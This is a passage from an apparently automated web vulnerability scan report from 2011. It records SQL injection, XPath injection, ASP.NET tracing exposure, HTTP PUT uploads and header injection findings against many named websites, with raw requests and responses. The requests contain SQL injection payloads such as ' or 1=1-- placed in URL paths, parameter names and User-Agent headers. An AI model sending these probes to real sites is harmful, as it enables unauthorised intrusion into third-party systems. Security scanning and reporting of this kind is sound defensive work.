Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico96460785' or 1=1--
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.nativeoutdoors.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico96460785'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:18:38 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Accept-Ranges: bytes
Content-Type: text/html
Content-Length: 3656

<html>

<head>
<meta http-equiv="Content-Language" content="en-us">
<meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
<title>Native Outdoors Page Not Found</title>
<meta name="Microsoft Border" content="t, default">
</head>

<body><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td>

<p align="center"><map name="FPMap0_I1">
<area href="http://www.nativeoutdoors.com/php/giveaway.php" shape="rect" coords="385, 2, 541, 27">
<area href="http://www.nativeoutdoors.com/contact.html" shape="rect" coords="546, 1, 680, 29">
<area href="http://order.store.yahoo.net/cgi-bin/wg-order?nativeoutdoors" shape="rect" coords="694, 0, 799, 30">
<area href="http://www.nativeoutdoors.com/index.html" shape="rect" coords="9, 0, 279, 117">
<area href="http://www.nativeoutdoors.com/index.html" shape="rect" coords="315, 2, 376, 26">
</map><img border="0" src="images/index/main/header.jpg" usemap="#FPMap0_I1" align="left" hspace="1" width="800" height="125"></p>

</td></tr></table><table dir="ltr" border="0" cellpadding="0" cellspacing="0" width="100%"><tr><td valign="top">

<p align="center"><map name="FPMap0_I1">
<area href="http://www.nativeoutdoors.com/scoutingcameras.html" shape="rect" coords="0, 119, 100, 149">
<area href="http://www.nativeoutdoors.com/deerfeeders.html" shape="rect" coords="99, 119, 213, 149">
<area href="http://www.nativeoutdoors.com/aerialassault.html" shape="rect" coords="214, 120, 317, 149">
<area href="http://www.nativeoutdoors.com/archery/index.html" shape="rect" coords="316, 120, 402, 149">
<area href="http://www.nativeoutdoors.com/guncases.html" shape="rect" coords="402, 119, 488, 149">

...[SNIP]...

1.19. http://www.nativeoutdoors.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.nativeoutdoors.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 16573550%20or%201%3d1--%20 and 16573550%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?116573550%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:18:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Content-Length: 518
Content-Type: text/html; charset=iso-8859-1
X-Pad: avoid browser bug

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<p>Additionally, a 404 Not Found
error was encountered while trying to use an ErrorDocument to handle the request.</p>
<hr>
<address>Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Server at www.nativeoutdoors.com Port 80</address>
</body></html>

Request 2

GET /favicon.ico?116573550%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.nativeoutdoors.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:18:13 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Tue, 09 Feb 2010 21:19:07 GMT
ETag: "1e6a094-cbe-47f3177cea8c0"
Accept-Ranges: bytes
Content-Length: 3262
Content-Type: image/x-icon

...... ..............(... ...@...............#...#..............................................................................................................................................................................................................=?>." [][...[][." =?>.................................." ......[][." .1/........................[][." ." .1/." ." =?>[][...yzy.....................=?>." ." .1/." ." .1/[][...yzy......................" ." ." .1/.................................." ." ." ." ." ." ....................................." ." yzy..............................=?>." ." ." ." ." LNM...jlj..............................." ." [][..............................." ." ." ." ." ." =?>...jlj..............................." ." =?>...jlj......................1/." ." ." ." ." ." ." ...[][..............................LNM." ." ...[][......................" ." ." ." ." ." ." ." ....................................jlj." ." .........................1/." ." ." ." ." ." ." ." ........................................" ." ........................." ." ." ." ." ." ." ." ." ........................................" ." ......................1/." ." ." ." ." ." ." ." ." [][...[][..............................." ." [][...jlj.........yzy." ." ." ." ." ." ." .1/." ." .1/...jlj..............................." ." .1/...jlj.........." ." ." ." ." ." ." ." ...[][." ." ....................................." ." ." ...[][......yzy." ." ." ." ." ." ." .1/......." ." [][...jlj............................" ." ." ............." ." ." ." ." ." ." ." .........." ." ." ..................................1/." ." .........[][." ." ." ." ." ." ." =?>.........."
...[SNIP]...

1.20. http://www.needlepointers.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.needlepointers.com
Path:	/favicon.ico

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.needlepointers.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2011 10:19:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 354
Content-Type: text/html
Set-Cookie: ASPSESSIONIDAADSDDTD=FJIJEFODIEFFIKFFFFMCFJCF; path=/
Cache-control: private

<font face="Arial" size=2>
<p>Microsoft OLE DB Provider for ODBC Drivers</font> <font face="Arial" size=2>error '80004005'</font>
<p>
<font face="Arial" size=2>[Microsoft][ODBC Driver Manager] Data s
...[SNIP]...

1.21. http://www.osbornewood.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.osbornewood.com
Path:	/favicon.ico

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.osbornewood.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:50:51 GMT
Server: Apache/2.2.16 (EL)
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=e29d3bebf89e00eb1536ce53fb29ce04; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 151
Connection: close
Content-Type: text/html; charset=UTF-8

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '.cfm'' at line 1

1.22. http://www.payentry.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.payentry.com
Path:	/favicon.ico

Issue detail

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.payentry.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:44 GMT
Connection: close

<html>
<head>
<title>Error</title>
</head>
<body>
<h1>Error</h1>
<p>The following error has occured while processing this request:</p>
<pre style="background-color: #e0e0e0;">Can't read list of app servers: Incorrect syntax near 'web'.
Unclosed quotation mark after the character string ''.
Statement(s) could not be prepared.
</pre>
...[SNIP]...

Request 2

GET /favicon.ico'' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.payentry.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 302 Object Moved
Content-Length: 161
Content-Type: text/html
Location: http://www5.payentry.com/favicon.ico''
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 11:37:44 GMT

<head><title>Document Moved</title></head>
<body><h1>Object Moved</h1>This document may be found <a HREF="http://www5.payentry.com/favicon.ico''">here</a></body>

1.23. http://www.state.de.us/favicon.ico [User-Agent HTTP header] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.state.de.us
Path:	/favicon.ico

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payloads 42840175'%20or%201%3d1--%20 and 42840175'%20or%201%3d2--%20 were each submitted in the User-Agent HTTP header. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.342840175'%20or%201%3d1--%20
Host: www.state.de.us
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 403 Forbidden
Date: Tue, 03 May 2011 10:25:02 GMT
Server: Apache/2.2.3 (Oracle)
Content-Length: 293
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access /favicon.ico
on this server.</p>
<hr>
<address>Apache/2.2.3 (Oracle) Server at www.state.de.us Port 80</address>
</body></html>

Request 2

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.342840175'%20or%201%3d2--%20
Host: www.state.de.us
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:25:02 GMT
Server: Apache/2.2.3 (Oracle)
Content-Length: 289
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /favicon.ico was not found on this server.</p>
<hr>
<address>Apache/2.2.3 (Oracle) Server at www.state.de.us Port 80</address>
</body></html>

1.24. http://www.straight.com/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.straight.com
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 14199974'%20or%201%3d1--%20 and 14199974'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico14199974'%20or%201%3d1--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:55 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:55 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417875"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35940

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>

<script language="javascript" type="text/javascript" src="/js/article_specific.js.min"></script>

<script language="javascript" type="text/javascript" src="/js/global.js.min.js"></script>

<script language="JavaScript">GA_googleAddAttr("section", "Arts");</script>
<script language="JavaScript">GA_googleAddAttr("section", "arts");</script>
<script language="
...[SNIP]...

Request 2

GET /favicon.ico14199974'%20or%201%3d2--%20 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.straight.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 03 May 2011 10:17:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Cache-Control: public, max-age=600
Last-Modified: Tue, 03 May 2011 10:17:57 +0000
Expires: Sun, 11 Mar 1984 12:00:00 GMT
Vary: Cookie
ETag: "1304417877"
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 35837

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" la
...[SNIP]...
<!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>
<script type="text/javascript">
<![CDATA[//><!]]>
</script>

<script language="javascript" type="text/javascript" src="/js/article_specific.js.min"></script>

<script language="javascript" type="text/javascript" src="/js/global.js.min.js"></script>

<script language="JavaScript">GA_googleAddAttr("section", "homepage");</script>
<script language="JavaScript">GA_googleAddAttr("section", "");</script>
<script language="
...[SNIP]...

1.25. http://www.thechildrenswearoutlet.com/favicon.ico [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://www.thechildrenswearoutlet.com
Path:	/favicon.ico

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 54576496%20or%201%3d1--%20 and 54576496%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /favicon.ico?154576496%20or%201%3d1--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thechildrenswearoutlet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 1

HTTP/1.1 302 Moved Temporarily
Date: Tue, 03 May 2011 10:35:27 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Last-Modified: Tue, 03 May 2011 10:35:27 GMT
Location: http://thechildrenswearoutlet.com/?sef_rewrite=1
Content-Length: 0
Content-Type: text/html; charset=utf-8

Request 2

GET /favicon.ico?154576496%20or%201%3d2--%20=1 HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.thechildrenswearoutlet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response 2

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 10:35:29 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 14 Apr 2010 19:20:24 GMT
ETag: "53a82e0-47e-4843745164e00"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon

............ .h.......(....... ..... .....................................................................f...b}..j...v...w.......................................................s..._...p...................}...}.......................~...............f.......................Yv..O]..fj..[`..W^..dr..j...p.......................................as..s~..MQ..QP..JH..BM..z......................................................x...y.......................................}...~...........r...i...s................................................Zr......]r..v...........v...z...........................................w...q...........q~..|...........................................\o..u...........v..........................y...............q...k~..t...{...x...u...........p...........084.R]r.............j~..]q..x...eq..hx..k...v...........i|..'.!.....IZk.............z...l...]fW.....>DA.L`..................o...x...................}.......Zn... .&4M.x.......................{...y...{...............v..........~..................................................z...t...s...o...j.......................................................................

2. ASP.NET tracing enabled previous next
There are 4 instances of this issue:

http://www.allentate.com/trace.axd
http://www.endlessvacation.com/trace.axd
http://www.identitychecks.com/trace.axd
http://www.woodworking.com/trace.axd

Issue background

ASP.NET tracing is a debugging feature which is designed for use during development to help troubleshoot problems. It discloses sensitive information to users, and if enabled in production contexts may present a serious security threat.

Application-level tracing enables any user to retrieve full details about recent requests to the application, including those of other users. This information includes session tokens and request parameters, which may enable an attacker to compromise other users and even take control of the entire application.

Page-level tracing returns the same information, but relating only to the current request. This may still contain sensitive data in session and server variables which would be of use to an attacker.

Issue remediation

To disable tracing, open the Web.config file for the application, and find the <trace> element within the <system.web> section. Either set the enabled attribute to "false" (to disable tracing) or set the localOnly attribute to "true" (to enable tracing only on the server itself).

Note that even with tracing disabled in this way, it is possible for individual pages to turn on page-level tracing either within the Page directive of the ASP.NET page, or programmatically through application code. If you observe tracing output only on some application pages, you should review the page source and the code behind, to find the reason why tracing is occurring.

It is strongly recommended that you refer to your platform's documentation relating to this issue, and do not rely solely on the above remediation.

2.1. http://www.allentate.com/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.allentate.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.allentate.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:36:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4641
Set-Cookie: Coyote-2-42a2c514=42a2c505:0;Path=/

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.2. http://www.endlessvacation.com/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.endlessvacation.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.endlessvacation.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:20:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 4626

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">
<table cellspacing="0" cellpadding="0" border="0" width="100%">
...[SNIP]...

2.3. http://www.identitychecks.com/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.identitychecks.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.identitychecks.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2011 10:21:50 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
COMMERCE-SERVER-SOFTWARE: Microsoft Commerce Server, Enterprise Edition
Set-Cookie: SourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: StoreSourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: TrackingSourceCode=9KWB18; expires=Wed, 04-May-2011 10:21:50 GMT; path=/
Set-Cookie: IDENT_CD_Cookie={6d0c0bb7-ba56-4773-bf25-81411b14a2c4}; expires=Fri, 03-May-2041 10:21:50 GMT; path=/
Set-Cookie: IDENT_CD_Cookie={6d0c0bb7-ba56-4773-bf25-81411b14a2c4}; expires=Fri, 03-May-2041 10:21:50 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/1999/REC-html401-19991224/loose.dtd">
...[SNIP]...

2.4. http://www.woodworking.com/trace.axd previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.woodworking.com
Path:	/trace.axd

Issue detail

ASP.NET tracing appears to be enabled at the application level.

Request

GET /trace.axd HTTP/1.0
Host: www.woodworking.com

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Tue, 03 May 2011 10:26:21 GMT
Connection: close

<html>
<head>
<style type="text/css">
span.tracecontent b { color:white }
span.tracecontent { background-color:white; color:black;font: 10pt verdana, arial; }
span.tracecontent table { clear:left
...[SNIP]...
<body>
<span class="tracecontent">

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
...[SNIP]...

3. XPath injection previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.atlanta.net
Path:	/favicon.ico

Issue detail

The REST URL parameter 1 appears to be vulnerable to XPath injection attacks. The payload ' was submitted in the REST URL parameter 1, and an XPath error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application appears to be using the ASP.NET XPath APIs.

Issue background

XPath injection vulnerabilities arise when user-controllable data is incorporated into XPath queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Depending on the purpose for which the vulnerable query is being used, an attacker may be able to exploit an XPath injection flaw to read sensitive application data or interfere with application logic.

Issue remediation

User input should be strictly validated before being incorporated into XPath queries. In most cases, it will be appropriate to accept input containing only short alhanumeric strings. At the very least, input containing any XPath metacharacters such as " ' / @ = * [ ] ( and ) should be rejected.

Request

GET /favicon.ico' HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.atlanta.net
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 500 Internal Server Error
Date: Tue, 03 May 2011 10:51:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 10203

<html>
<head>
<title>This is an unclosed string.</title>
<style>
body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;}
p {font-family
...[SNIP]...
</b>System.Xml.XPath.XPathException: This is an unclosed string.<br>
...[SNIP]...
<pre>

[XPathException: This is an unclosed string.]
MS.Internal.Xml.XPath.XPathScanner.ScanString() +1123732
MS.Internal.Xml.XPath.XPathScanner.NextLex() +3962705
MS.Internal.Xml.XPath.XPathParser.ParsePrimaryExpr(AstNode qyInput) +3947904
MS.Internal.Xml.XPath.
...[SNIP]...

4. HTTP PUT enabled previous next
There are 2 instances of this issue:

http://www.findire.com/favicon.ico
http://www.thenursingscholars.com/favicon.ico

Issue background

The HTTP PUT method is used to upload data which is saved on the server at a user-supplied URL. If enabled, an attacker can place arbitrary, and potentially malicious, content into the application. Depending on the server's configuration, this may lead to compromise of other users (by uploading client-executable scripts), compromise of the server (by uploading server-executable code), or other attacks.

Issue remediation

You should refer to your platform's documentation to determine how to disable the HTTP PUT method on the server.

4.1. http://www.findire.com/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.findire.com
Path:	/favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /d4df4917b70f8242.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /d4df4917b70f8242.txt HTTP/1.0
Host: www.findire.com
Content-Length: 16

310947143a6b91b6

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Tue, 03 May 2011 10:45:01 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.findire.com/d4df4917b70f8242.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /d4df4917b70f8242.txt HTTP/1.0
Host: www.findire.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Tue, 03 May 2011 10:45:01 GMT
Accept-Ranges: bytes
ETag: W/"ec633c277f9cc1:3a6"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:45:00 GMT
Connection: close

310947143a6b91b6

4.2. http://www.thenursingscholars.com/favicon.ico previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.thenursingscholars.com
Path:	/favicon.ico

Issue detail

HTTP PUT is enabled on the web server. The file /9ca2d0099ce061f7.txt was uploaded to the server using the PUT verb, and the contents of the file were subsequently retrieved using the GET verb.

Request 1

PUT /9ca2d0099ce061f7.txt HTTP/1.0
Host: www.thenursingscholars.com
Content-Length: 16

4b19641b55482e5d

Response 1

HTTP/1.1 201 Created
Connection: close
Date: Tue, 03 May 2011 10:38:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Location: http://www.thenursingscholars.com/9ca2d0099ce061f7.txt
Content-Length: 0
Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, LOCK, UNLOCK

Request 2

GET /9ca2d0099ce061f7.txt HTTP/1.0
Host: www.thenursingscholars.com

Response 2

HTTP/1.1 200 OK
Content-Length: 16
Content-Type: text/plain
Last-Modified: Tue, 03 May 2011 10:38:45 GMT
Accept-Ranges: bytes
ETag: W/"40d147477e9cc1:a1c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 03 May 2011 10:38:44 GMT
Connection: close

4b19641b55482e5d

5. HTTP header injection previous next
There are 10 instances of this issue:

http://ad.doubleclick.net/ad/tnews.lee.net/ [REST URL parameter 1]
http://ad.doubleclick.net/adi/N763.no_url_specifiedOX2462/B4639841.8 [REST URL parameter 1]
http://ad.doubleclick.net/adj/cm.rev_lee/ [REST URL parameter 1]
http://d7.zedo.com/bar/v16-405/d3/jsc/fm.js [$ parameter]
http://d7.zedo.com/bar/v16-405/d3/jsc/fmr.js [$ parameter]
http://www.askdramy.com/favicon.ico [REST URL parameter 1]
http://www.grubhub.com/favicon.ico [REST URL parameter 1]
http://www.haircuttery.com/favicon.ico [REST URL parameter 1]
http://www.homebasedofficework.com/favicon.ico [REST URL parameter 1]
http://www.imaxenes.com/favicon.ico [REST URL parameter 1]

Issue background

